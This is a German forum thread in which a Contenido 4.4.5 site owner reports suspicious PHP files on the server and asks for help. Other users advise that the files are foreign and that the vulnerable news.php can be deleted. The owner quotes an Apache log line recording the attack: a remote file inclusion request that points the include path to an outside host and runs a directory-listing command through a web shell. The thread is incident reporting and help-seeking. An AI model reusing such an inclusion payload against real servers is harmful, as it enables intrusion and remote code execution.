Spam versendet / Zugriff auf Server erhalten?

[acquire]

Hallo zusammen,

ich verwende Contenido 4.4.5.

Sind die Dateien

http://website.de/contenido/cronjobs/7.php
http://www.website.de/contenido/cronjobs/image.php
http://www.website.de/contenido/cronjobs/mailer.php
http://www.website.de/contenido/logs/data.php
http://www.website.de/contenido/logs/c.php

von COntenido? Denn sonst hatte ein Hacker Zugriff auf den Server.

Die Dateien waren dem User wwwrun zugeordnet, was darauf hinweist, dass die Dateien über eine Sicherheitslücke imPHP-Scriptgekommen sind.

Apache Logfile-Auszug:

..
website.de***ANGREIFER_IP - - [02/Jul/2007:14:30:24 +0200] "POST /contenido/external/frontend/news.php?cfg%5Bpath%5D%5Bincludes%5D=http%3A%2F%2Flott.by%2Fa%3F&act=ls&d=%2Fwww%2Fhtdocs%2Ftkkg%2Fcontenido%2Fcronjobs&sort=0a HTTP/1.1" 200 40870 "http://website.de/contenido/external/fr ... bs&sort=0a" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"

Gefunden habe ich nun folgendes Thema:
http://www.contenido.org/forum/viewtopi ... 6719#66719

Kann ich damit die Sicherheitslücke schließen und alles ist gut?

Ich hoffe auf eine schnelle Antwort.

Gruß, acquire

[anjaka]

Hi,
die Daten gehören nicht zu contenido 4.4.5.

Hatte die Version vor kurzem auch noch irgendwo laufen und dort waren ähnlich Dateien im conlib-Ordner.

Gruß anjaka

[HerrB]

Die news.php wird - wenn kein Newsletter verwendet wird oder die aktuellen Newsletter-Module verwendet werden (siehe Signatur) nicht mehr verwendet und kann bedenkenlos gelöscht werden (sowohl im Mandanten-Verzeichnis, als auch bei contenido/external/frontend).

Gruß
HerrB

[acquire]

Danke für die Antworten.

Mittlerweile weiß ich nicht mehr was ich damals am Newsletter geändert habe. War aber - so glaube ich - eine angepasste Version von dir. Vorsichtshalber lasse ich die news.php erstmal drauf.